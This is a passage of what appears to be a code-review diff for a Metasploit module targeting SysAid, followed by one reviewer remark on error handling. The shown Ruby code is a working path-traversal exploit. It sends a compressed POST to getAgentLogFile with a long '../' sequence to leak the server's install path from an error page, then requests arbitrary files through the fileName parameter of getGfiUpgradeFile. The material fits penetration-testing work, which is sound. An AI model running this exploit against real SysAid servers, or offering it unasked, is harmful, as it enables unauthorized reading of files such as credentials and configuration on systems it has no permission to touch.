modules/auxiliary/admin/http/sysaid_file_download.rb

```
@@ -0,0 +1,148 @@
+      ], self.class)
+  end
+
+
+  def get_traversal_path
+    print_status("#{peer} - Trying to find out the traversal path...")
+    large_traversal = '../' * rand(15...30)
+    servlet_path = 'getAgentLogFile'
+
+    # We abuse getAgentLogFile to obtain the
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
+      'method' => 'POST',
+      'data' => Zlib::Deflate.deflate(Rex::Text.rand_text_alphanumeric(rand(100) + rand(300))),
+      'ctype' => 'application/octet-stream',
+      'vars_get' => {
+        'accountId' => large_traversal + Rex::Text.rand_text_alphanumeric(8 + rand(10)),
+        'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10))
+      }
+    })
+
+    if res && res.code == 200
+      if res.body.to_s =~ /\<H2\>(.*)\<\/H2\>/
+        error_path = $1
+        # Error_path is something like:
+        # /var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../ajkdnjhdfn/1421678611732.zip
+        # This calculates how much traversal we need to do to get to the root.
+        position = error_path.index(large_traversal)
+        if position != nil
+          return "../" * (error_path[0,position].count('/') - 2)
+        end
+      end
+    end
+  end
+
+
+  def download_file (download_path)
+    begin
+      return send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(datastore['TARGETURI'], 'getGfiUpgradeFile'),
+        'vars_get' => {
+          'fileName' => download_path
+        },
+      })
+    rescue Rex::ConnectionRefused
+      print_error("#{peer} - Could not connect.")
+      return
+    end
+  end
+
+
+  def run
+    # No point to continue if filepath is not specified
+    if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?
+      print_error("Please supply the path of the file you want to download.")
```

Use fail_with instead of print_error /return